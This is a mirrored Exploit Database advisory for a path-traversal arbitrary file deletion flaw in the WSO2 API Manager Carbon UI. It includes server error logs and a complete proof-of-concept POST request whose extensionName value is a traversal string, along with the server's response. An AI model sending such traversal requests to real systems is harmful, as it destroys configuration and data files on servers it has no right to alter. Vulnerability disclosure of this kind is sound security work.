WSO2 3.1.0 – Arbitrary File Delete

• Exploit Database
• 131 阅读

• 作者： Raki Ben Hamouda
  日期： 2020-04-13
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/48313/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

  # Title: WSO2 3.1.0 - Arbitrary File Delete # Date: 2020-04-12 # Author: raki ben hamouda # Vendor: https://apim.docs.wso2.com # Softwrare link: https://apim.docs.wso2.com/en/latest/ # CVE: N/A     Document Title: =============== WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal )     ##CVE not assigned yet   ##Security Update : https://apim.docs.wso2.com/en/latest/     Common Vulnerability Scoring System: ==================================== 8.5     Affected Product(s): ==================== WSO2 API Manager Carbon Interface   Exploitation Technique: ======================= Remote     Severity Level: =============== High     Technical Details & Description: ================================ A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product . The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests and to delete arbitrary System files.   The vulnerability is located in the <code>/carbon/extensions/deleteExtension-ajaxprocessor.jsp</code> modules and the <code>extensionName</code> parameter of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files via authenticated POST method requests with a crafted String arbitrary traversal files names in"extensionName" .   The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction. Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality.   ===============================   Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...)   [2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension. org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d eployment\server\registryextensions\commons-dir at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j ava:531) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.handleResponse( OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.client.OperationClient.execute(OperationClient.java: 149) ~[axis2_1.6.1.wso2v38.jar:?] at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte nsions.stub_4.7.13.jar:?] at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient. deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens ions.ui_4.7.13.jar:?] at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?] at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t omcat_9.0.22.wso2v1.jar:?]   *Error displayed in Web browser with body request:   <script type="text/javascript"> CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar"); </script>       =============================   Request Method(s): [+] POST   Vulnerable Module(s): [+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp   Vulnerable Parameter(s): [+] extensionName     Server version 3.0.0     Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.     1-Attacker must have access to the Extension component(List ,Add ,Delete extensions ) 2-attackeruploads any file .jar extension 3-attacker intercepts the request that follows and modifies the parameter with traversal string:   --- PoC Session Logs [POST] ---   POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1 Host: localhost:9443 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest, XMLHttpRequest X-Prototype-Version: 1.5.0 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS Content-Length: 22 Origin: https://localhost:9443 Connection: close Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions Pragma: no-cache Cache-Control: no-cache   extensionName=../../../../INSTALL.txt   ---------------Returned Headers in Response------------------   HTTP/1.1 200 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Content-Type: text/html;charset=UTF-8 Content-Length: 10 Date: Sat, 04 Jan 2020 00:55:38 GMT Connection: close Server: WSO2 Carbon Server